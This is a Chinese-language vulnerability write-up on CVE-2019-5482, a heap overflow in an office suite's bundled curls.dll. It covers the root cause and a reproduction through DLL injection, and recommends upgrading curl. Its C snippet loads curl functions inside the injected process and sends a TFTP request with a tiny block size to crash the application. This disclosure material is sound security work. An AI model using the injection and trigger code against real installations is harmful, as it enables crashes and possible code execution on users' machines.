某办公软件curls共享库堆溢出漏洞

阅读量    100456 |

分享到: QQ空间 新浪微博 微信 QQ facebook twitter

 

漏洞说明

产品:某办公软件 校园版

文件:curls.dll(7.64.1.0)

漏洞类型:堆溢出

漏洞函数:0x10042f25、0x10043744

 

漏洞分析

curl官方于2019年确认了该漏洞,同时分配了cve-2019-5482编号。该漏洞是由于客户端在设置TFTP协议的blocksize参数不当,设置了小于默认值的blocksize,这使得在后续接受服务端数据时产生堆溢出。存在漏洞的源代码位于curl库中的tftp.c中,如下:

当用户设置了blksize后,会在首次创建连接时重新为存放服务端数据的数据指针state->rpacket.data创建对应大小的堆块,但是在接收服务端数据时,要拷贝的数据大小是默认的512,如图:

因此如果服务端发送了超长的数据包,就会产生堆溢出。

在该办公软件的curls.dll中存在漏洞的代码如下:

在该办公软件应用中,默认加载了该动态库,主要用于网络传输、访问、下载文件等。目前尚未找到直接攻击面比如通过打开文件来直接触发该漏洞,只能通过进程注入的方式调用curls.dll的内部函数来触发该漏洞。

 

漏洞复现

需要编写独立的dll程序来在该办公软件进程空间内部获取curls.dll的句柄,进而得到特定的导出函数,如curl_easy_initcurl_easy_setoptcurl_easy_performcurl_easy_cleanup

随后在远端监听udp 69端口,并将一个大文件指向该端口用于传输首次的tftp协议交互内容,在win7上通过创建远程线程的方式让该办公软件加载我们编写好的dll即可触发该漏洞。代码如下:

HANDLE curldll = GetModuleHandleA("curls.dll");
const char* testftpurl = "tftp://192.168.44.147/test.txt";
typedef CURLcode (myeasycurl)(CURL* data, CURLoption tag,...);
typedef void* curlinit(void);
typedef CURLcode curleasyperform(CURL* data);
typedef void curleasycleanup(CURL* data);
curlinit* myinit;
myeasycurl* mycurl;
curleasyperform* myperform;
curleasycleanup* mycleanup;
mycurl = (myeasycurl*)GetProcAddress((HMODULE)curldll, "curl_easy_setopt");
myinit = (curlinit*)GetProcAddress((HMODULE)curldll, "curl_easy_init");
myperform = (curleasyperform*)GetProcAddress((HMODULE)curldll, "curl_easy_perform");
mycleanup = (curleasycleanup*)GetProcAddress((HMODULE)curldll, "curl_easy_cleanup");
CURL* curl;
CURLcode res;
curl = (CURL*)myinit();
mycurl(curl,CURLOPT_URL,testftpurl);
mycurl(curl, CURLOPT_TFTP_BLKSIZE, 20);
res = myperform(curl);
mycleanup(curl);

接下来利用windbg附加***office.exe程序,利用注入工具将我们的dll加载到***office中,触发tftp请求,随后产生如下错误:

错误类型如下:

可以看出是堆相关的错误,由于堆溢出造成了已经free的堆的头部遭到了破坏,而在申请堆时会对堆头进行检查,如果检查没有通过则会抛出异常,最终导致应用程序崩溃,如果是经过精心构造的数据,也可能会造成任意代码执行。

在相关的函数下断后,观察申请到的堆块如下:

堆块的大小为50个字节,接收数据后如下:

已经将其它堆的内容覆盖掉,在后续堆管理器对被覆盖的堆进行操作时就可能触发崩溃。

 

修复建议

直接升级到curl官方的最新版,因为该版本下还有多个高危漏洞。

 

漏洞演示

https://www.bilibili.com/video/BV1TK4y1a7XX/

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读
|发表评论
|评论列表
加载更多